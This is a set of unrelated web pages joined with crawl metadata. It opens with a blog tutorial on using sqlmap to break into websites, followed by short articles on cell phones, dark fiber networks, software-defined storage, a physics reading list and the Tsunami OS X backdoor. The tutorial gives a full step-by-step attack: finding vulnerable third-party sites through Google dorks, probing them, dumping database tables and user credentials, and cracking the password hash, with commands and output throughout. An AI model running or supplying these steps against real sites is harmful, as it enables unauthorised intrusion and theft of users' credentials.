SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL databases. In this guide I will show you how to SQLMAP SQL Injection on Kali Linux to hack a website (more specifically Database) and extract usernames and passwords on Kali Linux. What is SQLMAP sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. - Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems. - Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band. - Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name. - Support to enumerate users, password hashes, privileges, roles, databases, tables and columns. - Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack. - Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry. - Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass. - Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. - Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. - Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice. - Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command. Be considerate to the user who spends time and effort to put up a website and possibly depends on it to make his days end. Your actions might impact someone is a way you never wished for. I think I can’t make it anymore clearer. So here goes: Step 1: Find a Vulnerable Website This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results. Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here. |Google Dork string Column 1||Google Dork string Column 2||Google Dork string Column 3| Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive. Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this: Just add a single quotation mark ‘ at the end of the URL. (Just to ensure, ” is a double quotation mark and ‘ is a single quotation mark). So now your URL will become like this: If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page. See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons. Examples of SQLi Errors from Different Databases and Languages Microsoft SQL Server Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’. Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12 Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12 java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208) Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated Query failed: ERROR: unterminated quoted string at or near “‘’’” Step 2: List DBMS databases using SQLMAP SQL Injection As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable. Run the following command on your vulnerable website with. sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs sqlmap = Name of sqlmap binary file -u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”) –dbs = Enumerate DBMS databases See screenshot below. This commands reveals quite a few interesting info: web application technology: Apache back-end DBMS: MySQL 5.0 [10:55:53] [INFO] retrieved: information_schema [10:55:56] [INFO] retrieved: sqldummywebsite [10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com' So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsite database. Step 3: List tables of target database using SQLMAP SQL Injection Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables Sweet, this database got 8 tables. [10:56:20] [INFO] fetching tables for database: 'sqldummywebsite' [10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2' [10:56:22] [INFO] the SQL query used returns 8 entries [10:56:25] [INFO] retrieved: item [10:56:27] [INFO] retrieved: link [10:56:30] [INFO] retrieved: other [10:56:32] [INFO] retrieved: picture [10:56:34] [INFO] retrieved: picture_tag [10:56:37] [INFO] retrieved: popular_picture [10:56:39] [INFO] retrieved: popular_tag [10:56:42] [INFO] retrieved: user_info and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains username and passwords. Step 4: List columns on target table of selected database using SQLMAP SQL Injection Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns This returns 5 entries from target table user_info of sqldummywebsite database. [10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite' [10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2' [10:57:18] [INFO] the SQL query used returns 5 entries [10:57:20] [INFO] retrieved: user_id [10:57:22] [INFO] retrieved: int(10) unsigned [10:57:25] [INFO] retrieved: user_login [10:57:27] [INFO] retrieved: varchar(45) [10:57:32] [INFO] retrieved: user_password [10:57:34] [INFO] retrieved: varchar(255) [10:57:37] [INFO] retrieved: unique_id [10:57:39] [INFO] retrieved: varchar(255) [10:57:41] [INFO] retrieved: record_status [10:57:43] [INFO] retrieved: tinyint(4) AHA! This is exactly what we are looking for … target table user_login and user_password . Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection SQLMAP SQL Injection makes is Easy! Just run the following command again: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump Guess what, we now have the username from the database: [10:58:39] [INFO] retrieved: userX [10:58:40] [INFO] analyzing table dump for possible password hashes Almost there, we now only need the password to for this user.. Next shows just that.. Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user. sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump TADA!! We have password. [10:59:15] [INFO] the SQL query used returns 1 entries [10:59:17] [INFO] retrieved: 24iYBc17xK0e. [10:59:18] [INFO] analyzing table dump for possible password hashes Database: sqldummywebsite Table: user_info [1 entry] +---------------+ | user_password | +---------------+ | 24iYBc17xK0e. | +---------------+ But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their website vulnerable like that just can’t have a password like that. That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it. I have covered how to decrypt password extensively on this Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux post. If you’ve missed it, you’re missing out a lot. I will cover it in short here but you should really learn how to use hashcat. Step 7: Cracking password So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that? Step 7.a: Identify Hash type Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value: Excellent. So this is DES(Unix) hash. Step 7.b: Crack HASH using cudahashcat First of all I need to know which code to use for DES hashes. So let’s check that: cudahashcat --help | grep DES So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500. I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around. I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running: cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found and cracked the key. Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123 Sweet, we now even have the password for this user. Thanks for reading and visiting my website. There’s many other ways to get into a Database or obtain user information. You should practice such techniques on websites that you have permission to. Please share and let everyone know how to test their websites using this technique.
<urn:uuid:417c329e-96ab-4b2c-ab0e-e56514198c70>
CC-MAIN-2017-04
https://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00014-ip-10-171-10-70.ec2.internal.warc.gz
en
0.659938
3,402
2.625
3
Cell phones have brought a drastic change in almost everybody’s way of communication. Cell phones have become an integral part of people’s lives and have influenced them in various ways. They have become so popular and necessary today that for most of the people, it is hard to survive without a cell phone. It is a thing of past when cell phones were newly launched that they were just another means of communication. In today’s technologically advanced era, cell phones are more than just being a source of communication. When cell phones were introduced, people were excited because they were mobile. They provided the users the flexibility of talking through them wherever and whenever they wanted. Unlike the traditional phones, the users could carry them along. These were some of the big reasons why cell phones hit the minds of a large number of consumers and became their first choice. But the scene is far more different today than the past. Cell phones have become very common today due to their mobility and have become more than a necessity. It would not be a lot to say that cell phones are navigating the lives of people today. The world has become technologically advanced and everything today is getting hi-tech. The era of working with paper and pencil has gone. Today, most of the people prefer to save their personal information in PCs or in their cell phones rather than keeping it in a diary or something. Cell phones are designed to be multipurpose today. Apart from allowing the users to communicate through it, they also let the users to save their important information in them, to save personal contacts and also to access the internet. In fact, the cell phones have become mini computers today as the users can browse the web on their cell phones and can also carry various types of important information in them. Cell phones have really changed the lives of people a big deal. Not just this, cell phones have added a style to the lives, personality and the way of communication of the people. They are considered to be the most stylish means of communication. Cell phones have enabled multitasking for the users and they also let the users to do conferencing. No matter wherever they are, whatever they are doing, they can do various tasks while talking at the same time. On the whole, cell phones have really done a good job by bringing the people closer and being in touch with their families and friends. They have brought convenience in people’s lives and have done a lot than one can ever realize. Cell phones are the most delighting invention. This entry was posted on Friday, June 24th, 2011 at 8:05 am and is filed under Uncategorized. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
<urn:uuid:ad0f9a7e-feb9-44a0-bc27-f46c8d0bc44b>
CC-MAIN-2017-04
http://www.setelecom.ca/blog/2011/06/cell-phones-provide-a-stylish-way-of-communication/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00224-ip-10-171-10-70.ec2.internal.warc.gz
en
0.982523
566
2.671875
3
As we progress further into the era of web-based everything, there can be no denying that the networks supporting this explosion of networked interaction will be due for an innovative revamp. This is where the Internet2 initiative enters the picture. The Internet2 initiative is a gathering of minds dedicated to advancing networking applications and technologies. The consortium is working with the Energy Sciences Network (ESNet), which provides data connections for universities and institutions, to develop experiments on top of dormant networking resources collectively called “dark fiber.” While it could be several years before the fruits of their networking research extends to the masses, the teams are working on two prototype networks, including one that promises data transfer rates in the 100 gigabit per second range. To put that in context, Google is one of the companies on the cutting edge of this speedy network system with its announcement of building a 1 gigabit per second network for one of its communities. As Robert Vietzke, Internet2’s director of network services told Technology Review, “When you want to do something disruptive, when you want to try something really radical, you can’t do that on a network that people are trying to actually use. At the same time, it’s useful to test these ideas on real network infrastructure.” Vietzke says that in the past this kind of research required network researchers to buy spools of fiber, install them in a lab setting, and try with all their might to create the same conditions a national network would face. Dark fiber eliminates these purchases and difficulties simulating mega-networks by allowing them to use a large scale network with real traffic. Dark fiber refers to a rather extensive network of fiber that is laying unused, much of which had been purchased following the dot-com bubble burst for next to nothing. Internet2 and ESNet have leased this fiber for the next 20 years to work on their 100 gigabit per second network, which is a separate network that is left dark and open to whatever equipment and protocols researchers want to bring to it.
<urn:uuid:375c52e7-8a54-4a26-8071-996f3d47a1d7>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/07/25/new_hope_for_dark_fiber/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00224-ip-10-171-10-70.ec2.internal.warc.gz
en
0.956257
423
2.75
3
The Storage Networking Industry Association recently hosted an industry summit, “The Future of Computing – The Convergence of Memory and Storage through Non-Volatile Memory (NVM).” For a glimpse into the future, from some of the industry’s true thought leaders, check out the presentations [ZIP] and audio recordings [ZIP]. This view into the rapid developments in flash memory and other NVM technologies has given me a new-found appreciation for the concept of a software-defined data center (SDDC). SDN and the implications for storage Infrastructure managers who believe in the promise of software-defined data centers are beginning to see storage as the final piece of a puzzle that includes virtualization and SDN. However, this is only possible if the storage infrastructure itself can be separated, into: - software that controls and manages data, and - infrastructure that stores, copies and retrieves that data. In short, storage needs to have its own control- and data planes, each working seamlessly as an extension of the storage infrastructure. There are several reasons to separate the control plane and liberate the storage control software from the hardware. Here’s one: Software-defined storage allows offloading the computationally heavy aspects of storage-management-related functions—like RDMA protocol handling, advanced data lifecycle management, caching, and compression. The availability of large amounts of CPU power within private and public clouds opens all kinds of possibilities to both network and storage management. Those options were simply not feasible before. With more intelligence built into a control plane, storage architects are now able to take full advantage of two major changes in the data plane. 1. Optimizing performance for non-volatile memory The first change involves advancements in NVM technology—both the increasing affordability of solid state memory such as flash, and the new capabilities promised by next-gen storage technologies such as PCM and STT-RAM. Phase Change Memory (PCM) and Spin-transfer torque random-access memory (STT-RAM) have the access speeds and byte-addressable characteristics of the DRAM used in today’s servers. But, like flash, it also has the transformational benefit of solid state persistence. These prototype technologies are hugely more expensive than flash is today, but it is predicted that one of them will, , surpass even the cheapest forms of flash memory. But don’t ask me which horse to back! Regardless of which technology wins, the trends are clear: Within a few years, the majority of a server’s storage performance requirements will be served from some form of solid-state cache storage within the server itself. When this is combined with new network technology and software that thrives in a distributed architecture, it has major implications for storage design and implementation. Imagine how your infrastructure would change if every server had terabytes of super-fast solid-state memory connected together via ultra-low latency, intelligent networking. The fact is that many of the reasons we implement shared storage for mission critical applications today would simply disappear. Apart from niche applications, this vision is still a long way off, but this is where our industry is heading. 2. Optimizing capacity for really large disk drives The second major change is the demand to store and process massive amounts of data, which increases as we are able to extract more value from that data through Big Data analysis. This coincides with a dramatic reduction in the cost of storing that data. Very high density SATA drives, with capacities in excess of 10 TB per disk, are coming. But in order to surpass some hard, quantum-physics level limitations, they will use new storage techniques—such as shingled writes—and will be built optimally to store, but never overwrite or erase data. This means the storage characteristics at the data plane will be fundamentally different from those we are familiar with today. Furthermore, even with these improvements in the costs and density of magnetic disk, the economics of power consumption and data center real-estate mean that tape is becoming attractive again for long term archival storage. Finally, think about the economies of scale that large cloud providers have and the availability of the massive computing power they are able to place in close proximity to that data. This means those cloud providers will have a compelling value proposition for storing a large proportion of an organization’s cold data. Regardless of where and how this data is stored, the challenges of securing and finding that data, and managing the lifecycles of this massive amount of information means traditional methods of using files, folders and directories simply won’t be viable. New access and management techniques built on top of object-based access to data such as Amazon’s S3 and the open standards based CDMI interfaces will be the management and data-access protocols of choice. In the end, the only way to effectively combine the speed and performance of solid-state storage with the scale and price advantages of capacity-optimized storage is by using a software-defined storage infrastructure. It is the intelligence of a separate control plane powered by commodity CPU that will allow infrastructure managers and data center architects to take advantage of these two massive trends.
<urn:uuid:0aeb9bda-b9ab-4c72-8a7e-a4f447c90562>
CC-MAIN-2017-04
http://www.computerworld.com/article/2475927/data-storage-solutions/the-future-of-storage-is-software-defined.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00132-ip-10-171-10-70.ec2.internal.warc.gz
en
0.927561
1,070
2.515625
3
Philosophers have often claimed that the 19th century view of the world as a deterministic mechanism is naïve. Recent discoveries in physics have shown this view not only to be naïve but also to be false in the sense that it leads to predictions that are directly contradicted by an impressive sequence of accepted experimental results. Any hypothesis that claims to describe the world as it really is, as opposed to the world as it is observed, either leads to no testable predictions or predictions that are seen to be false. The key problem addressed by almost all of the books listed is that of reality. While of reality as “things as they really are”, science seems to be restricted to “things as we observe them”. The challenge to the 19th century views has come from two sources: Einstein’s theory of relativity and (primarily) quantum mechanics. As quantum mechanics and its extensions present the most direct challenge to the classical views of reality, most of the books in this list are popularizations of the main ideas of quantum theory, without the complicated mathematics. 1. Farewell to Reality: How Modern Physics Has Betrayed the Search for Scientific Truth, by Jim Baggott, Pegasus Books, ©2013, ISBN 9 – 781605 – 985749. Despite this book’s fascination with what it calls “fairy–tale physics”, it presents a good discussion of the current state of theoretical physics. It presents the problem of reality and tries to relate that to direct observations. What can we say about what we cannot observe? It then moves to the study of light and other microscopic phenomena, focusing on the experiments that lead to the quantum mechanics. There is a chapter on the basic structure of matter, followed by a discussion of the special and general theories of relativity, and the impact of these theories on observations. The main focus of the book is found in the second part, which presents the idea of “fairy tale” physics as a collection of theories that might be aesthetically pleasing but lead to no predictions that can be directly observed. Is a quark real, if you can never see one? 2. Quantum Reality: Beyond the New Physics, an Excursion into Metaphysics, by Nick Herbert, Anchor Books, ©1987, ISBN 9 – 78035 – 235693. This book presents physics (and all of science) as an attempt to characterize, rationalize, and predict “things as we observe them”, while metaphysics (especially ontology) as the study of “things as they really are” without regard to observables. It describes the search for reality and then immediately jumps to the challenges presented by quantum mechanics to knowing “things as they really are”. It then discusses 2 problems: the quantum measurement problem (why don’t we see quantum effects in the macroscopic world), and “spooky action at a distance (quantum entanglement). One interesting feature of this book is that it, more than the previous book, simply explains a number of experiments that totally demolish all “common sense” theories of how the world operates on the sub–microscopic level. The small amount of math in the book can be skipped without loss. 3. Quantum: Einstein, Bohr, and the Great Debate about the Nature of Reality by Manjit Kumar, W. H. Norton and Company, ©2008, ISBN 9 – 780393 – 078299. An exploration of the scientific and philosophical development of quantum theory, written almost in the fashion of a collection of biographies. There are a lot of personal stories told, such as the time that Bohr and Einstein tried to take the trolley to the Copenhagen Institute of Physics, but continually missed their stop because of their animated conversations. The “plot” of the book leads up to a long debate between Einstein and Bohr over the nature of reality and a thought experiment posed by Einstein that vexed Bohr to his death in 1962. This was quantum entanglement, which Einstein called “spooky action at a distance”. A test to establish the existence of quantum entanglement was proposed by John Bell in 1964 and rigorously carried out in 1982. Of particular interest to me is the story of Werner Heisenberg’s difficult and almost agonizing time leading to the development of his uncertainty principle. That hypothesis seems to have been an act of desperation. 4. The Age of Entanglement: When Quantum Physics Was Reborn, by Louisa Gilder Alfred A. Knopf, ©2009, ISBN 978 – 1 – 4000 – 4417 – 7. This book presents a collection of essays describing the events leading up to the debate between Bohr and Einstein over quantum entanglement. It covers the famous EPR (Einstein, Podolsky, and Rosen) experiment, which was thought to be untestable until John Bell set out the theoretical approach in 1964. As in the previous book, the (not overly) technical articles are accompanied by numerous personal stories. One example was Albert Einstein’s response to the proposition that quantum entities do not exist independently of being observed: “Do you really believe the moon is not there if nobody looks?” 5. The Structure of Scientific Revolutions, by Thomas S. Kuhn Third Edition, The University of Chicago Press, ©1996, ISBN 978 – 0 – 226 – 45808 – 3. This book is the classic investigation on how scientific theories evolve (Kuhn would not use the word “progresses”). While it does mention quantum mechanics, that is only one of the theories considered. Kuhn focuses on paradigms (Have you heard of “paradigm shift”? Kuhn popularized the term) as a collection of assumptions, practices, and attitudes surrounding any theory. Kuhn’s thesis is that a theory and its associated paradigm come into existence when enough evidence has been accumulated to create a formal statement and continues its life as “normal science” in which scientists attempt to expand the theory and explore its predictions experimentally. Eventually a theory might suffer anomalies, which are problems that the theory cannot allow or explain. The anomalies either are handled by expansion of the theory (as when the discovery of Neptune resolved the anomalies in the orbit of Uranus) or a crisis occurs and a new paradigm emerges (as when quantum theory provided explanations of the photoelectric effect). Kuhn’s work is a ground–breaking effort, and, as such, contains both many good ideas and many attempts to push the approach a bit too far. Most scientists agree that Kuhn’s basic principles are sound. following references are to audio and video courses published by The Teaching Company 4151 Lafayette Center Drive, Suite 100 Chantilly, VA 20151 – 1232 1 – 800 – 832 – 2412 6. Philosophy of Science, by Jeffrey L. Kasser, Course No. 4100, ©2006, marketed by The Teaching Company. (www.teach12.com) This is a strictly philosophical series, with science as its subject. It begins with an attempt to define the term “science” as opposed to a pseudo–science, such as astrology. It spends a long time on observation and how such give rise to theories. It covers the roles of discovery and explanation in science, and attempts to describe what a natural law might be, as opposed to an accidental generalization. This course covers a lot of philosophy, but presents it clearly and simply. 7. Science Wars: What Scientists Know and How They Know It, by Steven L. Goldman, Course No. 1235, ©2006, marketed by The Teaching Company. (www.teach12.com) This course begins by discussing the work of Plato (428 – 348 BCE) on the problems of knowledge and truth. How do scientists come about knowledge and how do they use this to produce theories? Is it valid to call any theory true? Again, a lot of philosophy, but well presented. 8. Quantum Mechanics: The Physics of the Microscopic World by Benjamin Course No. 1240, ©2009, marketed by The Teaching Company. (www.teach12.com) The best thing about this course is the explanation of the many solid experiments leading to the establishment of quantum mechanics and the discrediting of its competitors. Each experiment is well explained with particular attention to how the well–established results violate common sense. This is a video course with great visuals. It contains almost no mathematics.
<urn:uuid:fa750ecb-36a9-481f-a4ae-bd9b635c961c>
CC-MAIN-2017-04
http://www.edwardbosworth.com/Talks/ScienceLogicAndBelief_Biblography.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00398-ip-10-171-10-70.ec2.internal.warc.gz
en
0.924034
1,867
2.796875
3
With all the hype around cloud these days, figuring out where cloud fits and where it doesn’t can be challenging. Private cloud and virtualization often get confused with each other, but in fact, virtualization is usually a component of cloud, whether public or private. Let’s consider a couple of real-world examples to illustrate the difference between virtualization and a true private cloud deployment. Example 1 – Virtualization An IT department, continually installing/reinstalling new servers, implements a virtualization solution so they can provision infrastructure faster and consolidate servers. They virtualize servers using their hypervisor of choice along with management tools. They upload ISO files into their management software so they can install new OSes into a new virtual machine. They’re connected to the local network in order to manage the virtual machines or the orchestration software used for provisioning. And if they are charging back capacity to their internal customers’ budgets (Marketing, Sales, Engineering, etc.), they’re probably just splitting the cost between each group, or maybe tracking how many virtual machines they deploy for each department. Is this cloud? Not really. This is known as server consolidation, data center automation, etc. and the solution doesn’t meet all five characteristics of cloud computing: - On-demand self-service (IT still has to provision virtual machines for their internal customers). - Broad, network access (this deployment is only available for internal customers on the network) - Resource pooling (this is where virtualization fits, so yes, this requirement is met) - Rapid elasticity (IT still has to provision VMs individually by installing the OS and software, and they don’t necessarily scale fast) - Measured service (IT is charging costs back to other departments based on traditional budgeting, not based on actual usage) Example 2 – Private Cloud A company’s headquarters includes a central IT staff that supports company-wide and departmental applications. They also have several branch offices each with a local IT staff that focuses on break/fix repair of local desktops and network services. The branch offices may occasionally set up a local server and install software at a manager’s request, but they may prefer to ask central IT to provide supported servers or applications from HQ. Central IT is looking to provide better support for their branch offices without hiring more staff, speed up turnaround time when provisioning services for supported applications and even allow quick, easy servers on-demand to their branch offices for local, unsupported applications. So they install their hypervisor of choice, deploy storage in their preferred manner and add some management software. However, in addition to providing ISO files for VM installation, they also prepare some disk images with pre-installed, supported OSes. The management software allows multiple users of different access levels to perform tasks such as launching virtual machines, installing VMs from supported images or from unsupported ISOs, or rebooting machines or reconfiguring virtual networks between VMs. Now the Marketing department in a branch office can try out some new analytics software by logging into a portal, provisioning a new server, installing the trial software and using it for a few days. If they don’t like it, they turn it off and delete the VM. Engineering may deploy multiple VMs to set up a production application, but also spin up a few additional VMs to use as development and staging environments or continuous integration servers. They no longer have to put in capital budget requests for servers, or search through old supply closets for dusty old desktops to repurpose when needed. Is this a private cloud? Yes! This company is still using virtualization, but now they’ve added a level of self-service for branch offices. The service can be accessed using a VPN connection over the Internet or an SSL/TLS web-based portal (broad network access). Branch employees or local IT staff can spin up additional capacity quickly and turn it off just as fast (rapid elasticity). As a result, central IT can now meter actual usage of each service by various departments on a monthly or even hourly basis and charge those departments accordingly. So, while virtualization tends to be a component and enabler of cloud services, true cloud services provide specific benefits to both the consumers and the IT departments deploying them.
<urn:uuid:b9019189-13cf-447f-b594-3edd380a5e18>
CC-MAIN-2017-04
http://www.internap.com/2013/06/04/private-cloud-vs-virtualization/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00124-ip-10-171-10-70.ec2.internal.warc.gz
en
0.930233
893
2.640625
3
Malware authors have taken an old piece of malware developed for Linux and have modified it to attack the Mac OS X platform, warns ESET. The OS X malware has been named Tsunami after the original, and the name hints at its main function: roping the targeted computer into a botnet for executing Distributed Denial of Service attacks. Tsunami is controlled through IRC, and it contains a hardcoded list of IRC servers and channels to which it tries to connect one its entrenched on the victim’s computer. As one can read from the list of commands that can be sent from the C&C server to the client program, the malware allows many other things: What should worry users the most is that once Tsunami is installed on their computers, it can download further files (other malware or an update of its functionalities) and execute shell commands. It is still unknown what attack vector is used to land this particular piece of malware on the targeted machines, but it is safe to say that users should definitely decline any overt offers of making their computers part of a botnet, be extremely careful about unsolicited emails carrying attachments or embedded links, and keep their AV solutions up to date.
<urn:uuid:cb3f10a9-828d-4443-a6e9-1e91aaa396ee>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2011/10/26/tsunami-a-new-backdoor-for-mac-os-x/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00334-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951496
250
2.765625
3